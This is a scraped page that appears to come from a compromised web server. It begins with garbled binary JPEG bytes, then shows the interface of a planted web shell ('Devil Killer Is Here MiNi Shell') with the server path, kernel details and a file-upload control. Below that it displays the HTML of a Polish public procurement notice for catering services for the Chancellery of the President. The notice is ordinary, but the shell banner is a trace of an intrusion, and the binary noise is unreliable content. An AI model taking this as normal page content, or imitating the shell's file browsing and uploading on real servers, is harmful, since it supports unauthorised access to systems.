JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250626/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20250626/0029614401-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Obsługa wizyt międzynarodowych oraz innych wydarzeń w zakresie usług gastronomicznych </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Centrum Obsługi Kancelarii Prezydenta Rzeczypospolitej Polskiej</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 142734982</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Wiejska 10</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">00-902</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.co@prezydent.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.co.kprp.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - instytucja gospodarki budżetowej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Umowy ramowej </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Obsługa wizyt międzynarodowych oraz innych wydarzeń w zakresie usług gastronomicznych </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-33acff04-1228-4004-a0f9-9a7985ed9291</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00296144</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-06-26</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00118224/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.5 &#34;Obsługa wizyt międzynarodowych oraz innych wydarzeń w zakresie usług gastronomicznych (catering w zakresie przyjęć zasiadanych i koktajlowych)&#34;</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.17.) Tryb zawarcia umowy ramowej wraz z podstawą prawną</h3> <p class="mb-0"> Umowa ramowa udzielana jest w trybie podstawowym na podstawie: art. 311 ust. 1 pkt 2 ustawy w zw. z art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zamowienia-cokprp.ezamawiajacy.pl/pn/zamowienia-cokprp/demand/215969/notice/public/details <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zamowienia-cokprp.ezamawiajacy.pl/pn/zamowienia-cokprp/demand/215969/notice/public/details</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	Postępowanie prowadzone jest w języku polskim na elektronicznej Platformie Zakupowej eZamawiający.pl (dalej jako „Platforma Zakupowa”) oraz pod nazwą postępowania wskazaną w tytule SWZ.<br/>2.	W celu zapoznania się z dokumentacją postępowania:<br/>1)	przed upływem terminu składania ofert Wykonawca w menu po lewej stronie wybiera zakładkę „Lista postępowań Pzp”, następnie zakładkę „Aktualne”, wyszukuje przedmiotowe postępowanie i klika w wybrany link, przechodząc do obszaru postępowania;<br/>2)	po upływie terminu składania ofert Wykonawca w menu po lewej stronie wybiera zakładkę „Lista postępowań Pzp”, następnie zakładkę „W toku”, wyszukuje przedmiotowe postępowanie i klika w wybrany link, przechodząc do obszaru postępowania.<br/>3.	W przedmiotowym postępowaniu komunikacja między Zamawiającym a Wykonawcami (w tym możliwość przekazywania sobie przez strony postępowania oświadczeń, wniosków, zawiadomień oraz informacji) odbywa się przy użyciu środków komunikacji elektronicznej za pośrednictwem Platformy Zakupowej na stronie przedmiotowego postępowania, w zakładce „Korespondencja”. Oświadczenia, wnioski, zawiadomienia lub informacje, które wpłyną do Zamawiającego, uważa się za dokumenty złożone w terminie, jeśli ich czytelna treść dotrze do Zamawiającego przed upływem tego terminu. Za datę wpływu oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich złożenia/wysłania na Platformie Zakupowej. <br/>4.	Na Platformie Zakupowej w zakładce „Baza wiedzy” znajduje się „Instrukcja dla Wykonawcy” opisująca korzystanie z Platformy Zakupowej, do której Wykonawca powinien się stosować. <br/>5.	Ogólne zasady korzystania z Platformy, z zastrzeżeniem ust. 11 Rozdziału X SWZ;<br/>5.1.	zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu na subdomenie Centrum Obsługi Kancelarii Prezydenta Rzeczypospolitej Polskiej; https://zamowienia-cokprp.ezamawiajacy.pl<br/>5.2.	Wykonawca po wybraniu opcji „przystąp do postępowania” zostanie przekierowany do strony https://oneplace.marketplanet.pl , gdzie zostanie powiadomiony o możliwości zalogowania lub do założenia bezpłatnego konta. Wykonawca zakłada konto wykonując kroki procesu rejestracyjnego; podaje adres e-mail, ustanawia hasło, następnie powtarza hasło, wpisuje kod z obrazka, akceptuje regulamin, klika polecenie „zarejestruj się”.<br/>5.3.	Rejestracja konta Wykonawcy następuje automatycznie poprzez:<br/>- podpisanie się pod wnioskiem podpisem elektronicznym (kwalifikowanym, osobistym lub profilem zaufanym);<br/>lub<br/>- kontakt z numerem telefonu podanym w potwierdzeniu;<br/>lub<br/>- jeżeli użytkownik nie podpisze się na wniosku ani nie skontaktuje się telefonicznie. Konto zostanie aktywowane w ciągu maksymalnie 6 godzin roboczych.<br/>5.4.	Po założeniu konta Wykonawca ma możliwość złożenia Oferty w postępowaniu za pośrednictwem zakładki „Oferty”.<br/>5.5.	Wszelką korespondencję kierowaną do Wykonawców, Zamawiający umieszcza na Platformie Zakupowej. Wykonawca zobowiązany jest we własnym zakresie sprawdzać i zapoznawać się z korespondencją umieszczoną na Platformie Zakupowej. Komunikacja między Zamawiającym a Wykonawcami, w szczególności zawiadomienia oraz informacje, przekazywane są w formie elektronicznej za pośrednictwem Platformy Zakupowej. Za datę przekazania zaświadczeń oraz informacji przyjmuje się datę ich wysłania za pośrednictwem zakładki „Korespondencja”.<br/>6. Szczegółowe informacje znajdują się w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.13. Zamawiający przewiduje pobranie ze złożonych katalogów elektronicznych danych potrzebnych do sporządzenia ofert dostosowanych do wymagań danego zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Szczegółowe informacje znajdują się w SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.CO-4/2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Świadczenie usług cateringowych i restauracyjnych w formie przyjęć zasiadanych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">55300000-3 - Usługi restauracyjne i dotyczące podawania posiłków</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">55310000-6 - Restauracyjne usługi kelnerskie</p> <p class="mb-0">55311000-3 - Restauracyjne usługi kelnerskie dla ograniczonej grupy klientów</p> <p class="mb-0">55312000-0 - Ogólne restauracyjne usługi kelnerskie</p> <p class="mb-0">55320000-9 - Usługi podawania posiłków</p> <p class="mb-0">55321000-6 - Usługi przygotowywania posiłków</p> <p class="mb-0">55322000-3 - Usługi gotowania posiłków</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował kryterium:<br/>a)	Kryterium nr 1 - Cena oferty brutto (C) - waga kryterium 40 punktów;<br/>b)	Kryterium nr 2 – Jakość, walory estetyczne i smakowe potraw, atrakcyjność podania (J) - waga kryterium 50 punktów;<br/>c)	Kryterium nr 3 – Wysokość marży na alkohol (M) - waga kryterium 10 punktów.<br/>2.	Całkowita liczba punktów, jaką otrzyma dana oferta zostanie obliczona wg poniższego wzoru, <br/>w zakresie każdej części zamówienia oddzielnie:<br/>L = C + J + M<br/>gdzie:<br/>L – całkowita liczba punktów,<br/>C – punkty uzyskane w kryterium „Cena oferty brutto”,<br/>J – punkty uzyskane w kryterium „Jakość, walory smakowe i estetyczne potraw, atrakcyjność podania”,<br/>M – punkty uzyskane w kryterium „Wysokość marży na alkohol”. <br/>3.	Zamawiający informuje, że w stosunku do kryteriów oceny ofert nie znajdują zastosowania przepisy art. 128 ustawy Pzp.<br/>4.	Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki (zasada zaokrąglenia – poniżej 5 należy końcówkę pominąć, powyżej i równe 5 należy zaokrąglić w górę).<br/>5.	Z Wykonawcami, których oferty uzyskały minimum 40 punktów w zakresie kryterium nr 2 – „Walory smakowe i estetyczne potraw, atrakcyjność podania, jakość” w ramach w danej części zostanie zawarta umowa ramowa w tej części.<br/>6.	Umowa ramowa, zostanie zawarta pomiędzy Zamawiającym, a wszystkimi Wykonawcami dla poszczególnych części, których oferty odpowiadać będą wszystkim wymaganiom przedstawionym w ustawie Pzp oraz w SWZ i zostaną ocenione, jako najkorzystniejsze (w odpowiedniej kolejności) w oparciu o podane kryteria wyboru z zastrzeżeniem ust. 9 powyżej. <br/>7.	W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym zaoferowanej ceny.<br/><br/>Szczegółowe informacje znajdują się w SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Jakość, walory estetyczne i smakowe potraw, atrakcyjność podania</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">50</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Wysokość marży na alkohol</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Świadczenie usług cateringowych i restauracyjnych w formie przyjęć koktajlowych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">55300000-3 - Usługi restauracyjne i dotyczące podawania posiłków</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">55310000-6 - Restauracyjne usługi kelnerskie</p> <p class="mb-0">55311000-3 - Restauracyjne usługi kelnerskie dla ograniczonej grupy klientów</p> <p class="mb-0">55312000-0 - Ogólne restauracyjne usługi kelnerskie</p> <p class="mb-0">55320000-9 - Usługi podawania posiłków</p> <p class="mb-0">55321000-6 - Usługi przygotowywania posiłków</p> <p class="mb-0">55322000-3 - Usługi gotowania posiłków</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował kryterium:<br/>a)	Kryterium nr 1 - Cena oferty brutto (C) - waga kryterium 40 punktów;<br/>b)	Kryterium nr 2 – Jakość, walory estetyczne i smakowe potraw, atrakcyjność podania (J) - waga kryterium 50 punktów;<br/>c)	Kryterium nr 3 – Wysokość marży na alkohol (M) - waga kryterium 10 punktów.<br/>2.	Całkowita liczba punktów, jaką otrzyma dana oferta zostanie obliczona wg poniższego wzoru, <br/>w zakresie każdej części zamówienia oddzielnie:<br/>L = C + J + M<br/>gdzie:<br/>L – całkowita liczba punktów,<br/>C – punkty uzyskane w kryterium „Cena oferty brutto”,<br/>J – punkty uzyskane w kryterium „Jakość, walory smakowe i estetyczne potraw, atrakcyjność podania”,<br/>M – punkty uzyskane w kryterium „Wysokość marży na alkohol”. <br/>3.	Zamawiający informuje, że w stosunku do kryteriów oceny ofert nie znajdują zastosowania przepisy art. 128 ustawy Pzp.<br/>4.	Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki (zasada zaokrąglenia – poniżej 5 należy końcówkę pominąć, powyżej i równe 5 należy zaokrąglić w górę).<br/>5.	Z Wykonawcami, których oferty uzyskały minimum 40 punktów w zakresie kryterium nr 2 – „Walory smakowe i estetyczne potraw, atrakcyjność podania, jakość” w ramach w danej części zostanie zawarta umowa ramowa w tej części.<br/>6.	Umowa ramowa, zostanie zawarta pomiędzy Zamawiającym, a wszystkimi Wykonawcami dla poszczególnych części, których oferty odpowiadać będą wszystkim wymaganiom przedstawionym w ustawie Pzp oraz w SWZ i zostaną ocenione, jako najkorzystniejsze (w odpowiedniej kolejności) w oparciu o podane kryteria wyboru z zastrzeżeniem ust. 9 powyżej. <br/>7.	W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym zaoferowanej ceny.<br/><br/>Szczegółowe informacje znajdują się w SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Jakość, walory estetyczne i smakowe potraw, atrakcyjność podania</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">50</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Wysokość marży na alkohol</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O zawarcie umowy ramowej mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu, na zasadach określonych w Rozdziale VI SWZ oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/>2. O zawarcie umowy ramowej mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym:<br/>Wykonawca powinien być wpisany do KRS lub CEiDG, o ile wymóg taki wynika z odrębnych przepisów, lub do jednego z rejestrów zawodowych lub handlowych prowadzonych w kraju, w którym ma siedzibę lub miejsce zamieszkania.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Na potwierdzenie spełnienia niniejszego warunku, Zamawiający żąda od Wykonawcy posiadania wpisu do rejestru zakładów, o którym mowa w art. 62 ust. 1 pkt 1) ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (Dz. U. z 2023 r. poz. 1448).<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>4) zdolności technicznej lub zawodowej:<br/>A.część I:<br/>Na potwierdzenie spełnienia niniejszego warunku, Zamawiający żąda od Wykonawcy wykazania się wykonaniem, a w przypadku świadczeń okresowych lub ciągłych również wykonywaniem z należytą starannością w okresie ostatnich 7 lat przed upływem terminu składania ofert – a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, co najmniej dwóch zamówień (na podstawie jednej lub dwóch umów, przy czym pod pojęciem umowy należy rozumieć każde zamówienie) w zakresie usług restauracyjnych lub cateringowych, świadczonych w ramach co najmniej dwustronnych spotkań rządowych lub państwowych o charakterze międzynarodowym, w których uczestniczyło odpowiednio minimum 30 i 70 uczestników, w tym brały udział co najmniej dwie z następujące osób: Prezydenci lub Głowy Państw lub Prezesi Rady Ministrów lub Ministrowie Spraw Zagranicznych lub Ambasadorzy lub Marszałkowie lub Wicemarszałkowie Sejmu lub Senatu lub Przewodniczący lub Wiceprzewodniczący Parlamentów Państwowych.<br/>Każde z zamówień musiało obejmować jednocześnie:<br/>-przygotowanie następujących potraw z produktów Wykonawcy: przystawka, danie obiadowe (zupa lub danie główne), deser;<br/>-serwis (odpowiednie przygotowanie stołu tj. nakrycia, dekoracji, zastawy stołowej i szkła);<br/>-obsługę kelnerską i kucharską.<br/>Łączna wartość dwóch zamówień musiała wynosić co najmniej 25 000 zł brutto.<br/>Zamawiający nie wymaga, aby zamówienie musiało być zrealizowane w obiekcie Wykonawcy.<br/>Zamawiający nie dopuszcza możliwości powoływania się na realizację zamówień dotyczących spotkań w których uczestniczyły osoby niepełniące oficjalnych funkcji w chwili spotkania (np. byli ministrowie lub wiceministrowie lub byli premierzy itd. jak i na usługi o charakterze przyjęć nieoficjalnych np. uroczystości rodzinne).<br/>B.część II:<br/>Na potwierdzenie spełnienia niniejszego warunku, Zamawiający żąda od Wykonawcy wykazania się wykonaniem, a w przypadku świadczeń okresowych lub ciągłych również wykonywaniem z należytą starannością w okresie ostatnich 7 lat 